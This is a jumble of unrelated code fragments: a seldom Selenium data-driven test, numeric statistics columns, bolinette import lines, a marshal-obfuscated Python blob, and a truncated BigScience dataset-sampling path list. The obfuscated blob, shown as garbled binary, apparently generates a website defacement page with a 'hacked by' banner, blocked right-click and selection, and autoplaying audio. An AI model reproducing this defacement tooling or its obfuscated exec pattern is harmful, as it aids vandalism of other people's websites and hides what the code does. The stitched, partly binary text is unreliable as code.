self.open(self.test_url)
self.switch_to_frame(id_="iframeResult")
self.type(name="firstname", text=username, clear=True)
self.type(name="lastname", text=password, clear=True)
self.sleep(1)
@file_data("yaml_data.yaml", key="name")
def test_yaml_list(self, firstname, lastname):
"""
        data-driven test using file_data
"""
self.open(self.test_url)
self.switch_to_frame(id_="iframeResult")
self.type(name="firstname", text=firstname, clear=True)
self.type(name="lastname", text=lastname, clear=True)
self.sleep(1)
@file_data("yaml_data.yaml", key="login")
    def test_yaml_dict(self, username, password):
"""
        data-driven test using file_data
"""
self.open(self.test_url)
self.switch_to_frame(id_="iframeResult")
self.type(name="firstname", text=username, clear=True)
self.type(name="lastname", text=password, clear=True)
self.sleep(1)
@file_data("csv_data.csv", line=2)
def test_csv(self, firstname, lastname):
"""
        data-driven test using file_data
"""
self.open(self.test_url)
self.switch_to_frame(id_="iframeResult")
self.type(name="firstname", text=firstname, clear=True)
self.type(name="lastname", text=lastname, clear=True)
self.sleep(1)
@file_data(file="excel_data.xlsx", sheet="Sheet1", line=2)
def test_excel(self, firstname, lastname):
"""
        data-driven test using file_data
"""
self.open(self.test_url)
self.switch_to_frame(id_="iframeResult")
self.type(name="firstname", text=firstname, clear=True)
self.type(name="lastname", text=lastname, clear=True)
self.sleep(1)
if __name__ == '__main__':
seldom.main(debug=True)
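# Illustrative sketch of the data files consumed above (assumed shape; the files are
# not shipped with this listing). With @file_data("json_data.json", key="name"),
# seldom looks up the "name" key and unpacks each entry into the test parameters:
#
# json_data.json
# {
#   "name":  [["Tom", "Smith"], ["Jane", "Doe"]],
#   "login": [{"username": "admin", "password": "admin123"}]
# }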
| 31.073171
| 85
| 0.617347
| 327
| 2,548
| 4.611621
| 0.186544
| 0.068966
| 0.095491
| 0.06366
| 0.811671
| 0.79443
| 0.769231
| 0.769231
| 0.769231
| 0.769231
| 0
| 0.005168
| 0.240581
| 2,548
| 81
| 86
| 31.45679
| 0.77416
| 0.049451
| 0
| 0.612245
| 0
| 0
| 0.153439
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0.081633
| 0.040816
| 0
| 0.204082
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
ec1a8d052dd84dfd2dc016d8bbb0064014f1eee5
| 98
|
py
|
Python
|
bolinette/web/defaults/middlewares/__init__.py
|
TheCaptainCat/flasque
|
d42deb57572084f513202a32c460186700ce8e0b
|
[
"MIT"
] | 3
|
2019-10-25T12:21:28.000Z
|
2020-09-11T13:43:32.000Z
|
bolinette/web/defaults/middlewares/__init__.py
|
TheCaptainCat/bolinette
|
d42deb57572084f513202a32c460186700ce8e0b
|
[
"MIT"
] | null | null | null |
bolinette/web/defaults/middlewares/__init__.py
|
TheCaptainCat/bolinette
|
d42deb57572084f513202a32c460186700ce8e0b
|
[
"MIT"
] | null | null | null |
import bolinette.web.defaults.middlewares.auth
import bolinette.web.defaults.middlewares.internal
| 32.666667
| 50
| 0.877551
| 12
| 98
| 7.166667
| 0.583333
| 0.348837
| 0.418605
| 0.604651
| 0.860465
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040816
| 98
| 2
| 51
| 49
| 0.914894
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
ec2ac68f7f248c2c7d30936057f571389db5f474
| 13,585
|
py
|
Python
|
webdav77-master/data/ScripCreate.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
webdav77-master/data/ScripCreate.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
webdav77-master/data/ScripCreate.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
# Compiled by 404rgr
# Respect other people's work :)
# 404rgr@gmail.com
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x02\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x02\x00Z\x02\x00d\x03\x00Z\x03\x00d\x04\x00Z\x04\x00d\x05\x00Z\x05\x00d\x06\x00Z\x06\x00d\x07\x00Z\x07\x00He\x07\x00d\x08\x00\x17GHe\x05\x00d\t\x00\x17GHe\x07\x00d\x08\x00\x17GHHe\x03\x00d\n\x00\x17GHe\x08\x00d\x0b\x00\x83\x01\x00Z\t\x00d\x0c\x00GHe\x08\x00d\x0b\x00\x83\x01\x00Z\n\x00d\r\x00GHe\x08\x00d\x0b\x00\x83\x01\x00Z\x0b\x00d\x0e\x00GHe\x08\x00d\x0b\x00\x83\x01\x00Z\x0c\x00d\x0f\x00GHe\x08\x00d\x0b\x00\x83\x01\x00Z\r\x00He\x06\x00d\x10\x00\x17GHe\x08\x00d\x0b\x00\x83\x01\x00Z\x0e\x00e\x0f\x00d\x11\x00e\x0e\x00\x17d\x11\x00\x17d\x12\x00\x83\x02\x00Z\x10\x00d\x13\x00Z\x11\x00e\t\x00Z\x12\x00d\x14\x00Z\x13\x00e\n\x00Z\x14\x00d\x15\x00Z\x15\x00e\x0b\x00Z\x16\x00d\x16\x00Z\x17\x00e\x0c\x00Z\x18\x00d\x17\x00Z\x19\x00e\r\x00Z\x1a\x00d\x18\x00Z\x1b\x00e\x10\x00j\x1c\x00e\x11\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x12\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x13\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x14\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x15\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x16\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x17\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x18\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x19\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x1a\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x1b\x00\x83\x01\x00\x01d\x19\x00GHe\x00\x00j\x1d\x00d\x1a\x00\x83\x01\x00\x01d\x1b\x00GHe\x0e\x00GHe\x00\x00j\x1d\x00d\x1c\x00\x83\x01\x00\x01e\x04\x00d\x1d\x00\x17GHe\x00\x00j\x1d\x00d\x1e\x00\x83\x01\x00\x01d\x1f\x00GHe\x10\x00j\x1e\x00\x83\x00\x00\x01e\x01\x00j\x1f\x00d\x11\x00e\x0e\x00\x17d\x11\x00\x17d \x00\x83\x02\x00\x01e \x00\x83\x00\x00\x01d\x01\x00S(!\x00\x00\x00i\xff\xff\xff\xffNs\x05\x00\x00\x00\x1b[91ms\x05\x00\x00\x00\x1b[92ms\x05\x00\x00\x00\x1b[93ms\x05\x00\x00\x00\x1b[94ms\x05\x00\x00\x00\x1b[36ms\x04\x00\x00\x00\x1b[0ms\x11\x00\x00\x00{<<<<<<[!]>>>>>>}s\x10\x00\x00\x00 Coded By 404rgrs\x0b\x00\x00\x00Judul/Titles\x04\x00\x00\x00==> s\x16\x00\x00\x00Hacked by: (nama/nick)s\x13\x00\x00\x00Masukan Link Gambars-\x00\x00\x00Teks/Pesan (gunakan <br> untuk Ke baris baru)s(\x00\x00\x00Marquee/Teks Berjalan(untuk bagian bawahs\x1c\x00\x00\x00Output {contoh : index.html}t\x00\x00\x00\x00t\x01\x00\x00\x00ws\x13\x00\x00\x00<html><head><title>s\xaf\x0f\x00\x00</title></head><body><br>\n<style type="text/css">body{background:url(https://3.bp.blogspot.com/-5Ma3lIrkPCk/W5p-c6bBmsI/AAAAAAAAALw/Gh-OIZLSiJc3QRCyShSytMNAtpUQoSSXQCLcBGAs/s320/Gambar%2BAnimasi%2BPetir%2BBergerak%2BWallpaper%2BKilat%2BMerah%2BLuar%2BBiasa.gif) repeat center center fixed black;}</style>\n<link href=\'http://fonts.googleapis.com/css?family=Orbitron:700\' rel=\'stylesheet\' type=\'text/css\'>\n<link href=\'http://fonts.googleapis.com/css?family=Anton\' rel=\'stylesheet\' type=\'text/css\'>\n<link href=\'http://fonts.googleapis.com/css?family=Josefin Sans\' rel=\'stylesheet\' type=\'text/css\'>\n<body bgcolor="#000000" background =><div class=\'CenterDiv\'><center><SCRIPT>\n\nfarbbibliothek = new Array(); \nfarbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100"); \nfarbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00"); \nfarbbibliothek[2] = new 
Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00"); \nfarbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040"); \nfarbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000"); \nfarbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF"); \nfarbbibliothek[6] = new Array("#33CCFF","#33CCCC","#33CC99","#33CC66","#33CC33","#33CC00"); \nfarbbibliothek[7] = new Array("#00dbdb","#00afdb","#0083db","#0058db","#002cdb","#2c00db","#5800db","#8300db","#af00db","#db00db"); \nfarbbibliothek[8] = new Array("#ffd8f4","#ffcff2","#ffc6f0","#ffbded","#ffb4eb","#ffabe8","#ffa2e6","#ff99e3","#ff90e1","#ff87de","#ff7edc","#ff75d9","#ff6cd7","#ff63d5","#ff5ad3","#ff51d1","#ff48cf","#ff3fcd","#ff36cb","#ff2dc9","#ff24c7","#ff1bc5","#ff12c3","#ff09c1","#f600b8","#ed00b1","#e400aa","#db00a3","#d2009c","#c90095","#c0008e","#b70087","#ae0080","#a50079","#9c0072","#93006b","#8a0064","#81005d","#780056","#6f004f","#660048","#5d0042","#54003b","#4b0035","#42002f","#390028","#300022","#27001b"); \nfarben = farbbibliothek[4];\nfunction farbschrift() \n{ \nfor(var i=0 ; i<Buchstabe.length; i++) \n{ \ndocument.all["a"+i].style.color=farben[i]; \n} \nfarbverlauf(); \n} \nfunction string2array(text) \n{ \nBuchstabe = new Array(); \nwhile(farben.length<text.length) \n{ \nfarben = farben.concat(farben); \n} \nk=0; \nwhile(k<=text.length) \n{ \nBuchstabe[k] = text.charAt(k); \nk++; \n} \n} \nfunction divserzeugen() \n{ \nfor(var i=0 ; i<Buchstabe.length; i++) \n{ \ndocument.write("<b><font face=\'jolly lodger\' size=\'40\' color=\'hotpink\'></a><span id=\'a"+i+"\' class=\'a"+i+"\'>"+Buchstabe[i] + "</span></font></b>"); \n} \nfarbschrift(); \n} \nvar a=1; \nfunction farbverlauf() \n{ \nfor(var i=0 ; i<farben.length; i++) \n{ \nfarben[i-1]=farben[i]; \n} \nfarben[farben.length-1]=farben[-1]; \n \nsetTimeout("farbschrift()",30); \n} \nvar farbsatz=1; \nfunction farbtauscher() \n{ \nfarben = farbbibliothek[farbsatz]; \nwhile(farben.length<text.length) \n{ \nfarben = farben.concat(farben); \n} \nfarbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001)); \n} \nsetInterval("farbtauscher()",5000); \ntext= \'<[ hacked by s\x8e\x00\x00\x00]>\';\n</script><span class=\'newclass\'>\n<script type="text/javascript">\nstring2array(text); \ndivserzeugen();\n</script></span>\n\n<center><img src=sG\x0e\x00\x00 width=450px height=340px>\n<body onload="init()"></body>\n<script type="text/javascript">\n// Hacked By : CopyRight404rgr\nTypingText = function(element, interval, cursor, finishedCallback) {\nif((typeof document.getElementById == "undefined") || (typeof\n\nelement.innerHTML == "undefined")) {\nthis.running = true;\nreturn;\n}\nthis.element = element;\nthis.finishedCallback = (finishedCallback ? 
[Unrecoverable record content: a compiled Python 2 (.pyc) marshal stream rendered as text. The recoverable fragments are an embedded HTML/JavaScript payload: the tail of a "TypingText" typing-animation script, two verbatim-duplicated AdFender <script> tags pointing at local.adfender.com, a <body> that blocks right-click, keypress, drag, and text selection, a disabled "commander" input, marquee banners, a blogspot.com background GIF, and a SoundCloud stream <iframe> (api.soundcloud.com/tracks/312530137). Also recoverable are Indonesian status strings: "wait...", "script tersimpan" ("script saved"), "memindahkan ke Sdcard" ("moving to Sdcard"), "Berhasil Tersimpan Di Sdcard" ("Successfully saved to Sdcard"), and the target path "/sdcard". The remaining bytes are bytecode and symbol-table debris (time, shutil, raw_input, ganteng1 through ganteng9, messagescri, messagescrit, write, sleep, close, move, exit, <debby>, <module>) with no further textual content.]
| 2,264.166667
| 13,503
| 0.713139
| 2,049
| 13,585
| 4.669595
| 0.245486
| 0.067726
| 0.031982
| 0.077759
| 0.364548
| 0.321593
| 0.279578
| 0.275502
| 0.26087
| 0.203386
| 0
| 0.184102
| 0.038793
| 13,585
| 5
| 13,504
| 2,717
| 0.548629
| 0.004417
| 0
| 0
| 0
| 4
| 0.938766
| 0.673347
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 8
|
ec3fa67d199843a9f351dc900507b54a080b649e
| 74,229
|
py
|
Python
|
data/catalogue/sample_and_convert_to_jsonl.py
|
cakiki/bigscience
|
7ccf7e42577fe71e88cf8bed3b9ca965c7afb8f7
|
[
"Apache-2.0"
] | null | null | null |
data/catalogue/sample_and_convert_to_jsonl.py
|
cakiki/bigscience
|
7ccf7e42577fe71e88cf8bed3b9ca965c7afb8f7
|
[
"Apache-2.0"
] | 1
|
2022-03-17T16:18:35.000Z
|
2022-03-17T16:18:35.000Z
|
data/catalogue/sample_and_convert_to_jsonl.py
|
cakiki/bigscience
|
7ccf7e42577fe71e88cf8bed3b9ca965c7afb8f7
|
[
"Apache-2.0"
] | null | null | null |
import argparse
import logging
import re
from pathlib import Path
from datasets import Dataset, load_from_disk
from datasets.utils.logging import set_verbosity_info
from numpy.random import default_rng
set_verbosity_info()
logger = logging.getLogger(__name__)
rng = default_rng(42)
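# Added descriptive comments (assumptions inferred from the file name
# sample_and_convert_to_jsonl.py and the values below, not stated in the file):
# - rng is seeded (42) so any subsampling is presumably reproducible across runs.
# - CATALOGUE_DATASETS appears to map each on-disk dataset path to a sampling
#   ratio used when converting to JSONL; a value of 1. would keep every example.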
CATALOGUE_DATASETS = {
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_enriched_conllu_ancora_for_ml_training": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_parlament_parla": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_odiencorp": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-as_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-as_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_book_dash_books": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_uit_vsmec": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indo4b_talpco": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_book_dash_books": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vietnamese_students_feedback": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_xquad_ca": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikimedia_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_401_www_elperiodicodemexico_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indonesian_frog_storytelling_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-tum_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indonli": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-bm_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-ki_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_viquiquad": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-ak_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-ts_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-st_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_vilaquad": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_bangla_sentiment_classification_datasets": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-ny_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikimedia_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-tw_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_mkb": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-tn_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wikimedia_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-ln_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-nso_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vinbigdata_asr_vlsp_2020": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_wikimedia_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_scielo": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-rn_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vinbigdata_mt_vlsp_2020": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indo4b_parallel": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indo4b_bppt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wiktionary_filtered": 1.,
